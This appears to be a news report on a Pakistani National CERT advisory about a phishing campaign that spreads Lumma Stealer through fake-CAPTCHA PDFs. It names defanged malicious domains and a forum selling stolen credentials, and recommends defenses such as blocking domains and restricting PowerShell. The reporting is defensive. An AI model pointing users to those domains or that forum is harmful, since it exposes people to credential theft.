Pakistan’s National Computer Emergency Response Team (National CERT) has issued an alert regarding an extensive phishing campaign leveraging fake CAPTCHA images in PDF files to distribute Lumma Stealer malware.
The cyberattack has impacted thousands of users, primarily targeting the technology, financial services, and manufacturing sectors. Most victims are located in North America, Asia, and Southern Europe.
According to National CERT, cybercriminals have manipulated search engine results to distribute fraudulent PDFs. These documents contain deceptive CAPTCHA images, prompting users to click on links that lead to phishing sites designed to steal sensitive financial data or install Lumma Stealer malware.
Attackers have used platforms such as PDFCOFFEE, PDF4PRO, and Internet Archive to host these malicious PDFs, increasing their visibility in search results and making them appear legitimate.
Lumma Stealer, identified as a Malware-as-a-Service (MaaS) tool, is capable of extracting login credentials, browser cookies, and cryptocurrency wallet information. Additionally, the malware deploys GhostSocks, a proxy tool that exploits victims’ internet connections.
The stolen credentials are reportedly being sold on underground forums like Leaky[.]pro, while malicious domains associated with this campaign include pdf-freefiles[.]com, webflow-docs[.]info, secure-pdfread[.]site, and docsviewing[.]net.
National CERT has advised organizations to implement robust security measures to mitigate risks. Recommended actions include employee awareness programs on phishing threats, advanced endpoint protection deployment, and restricting PowerShell and MSHTA execution.
Other critical security steps include blocking malicious domains, enabling PowerShell logging, enforcing multi-factor authentication (MFA), and monitoring search engine results for fraudulent domains mimicking legitimate services.
The advisory highlights the increasing sophistication of cyber threats and urges organizations to adopt proactive security strategies. Best practices such as regular patch management, restricting administrative privileges, and using application whitelisting were emphasized to strengthen cybersecurity defenses and prevent data breaches.
